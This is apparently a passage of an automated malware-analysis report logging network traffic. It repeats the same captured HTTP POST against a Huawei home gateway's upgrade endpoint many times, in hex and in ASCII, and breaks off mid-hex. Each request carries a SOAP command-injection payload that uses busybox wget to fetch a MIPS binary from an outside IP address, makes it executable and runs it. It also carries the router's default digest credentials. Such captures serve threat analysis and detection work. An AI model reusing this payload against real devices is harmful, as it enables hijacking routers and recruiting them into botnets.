wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 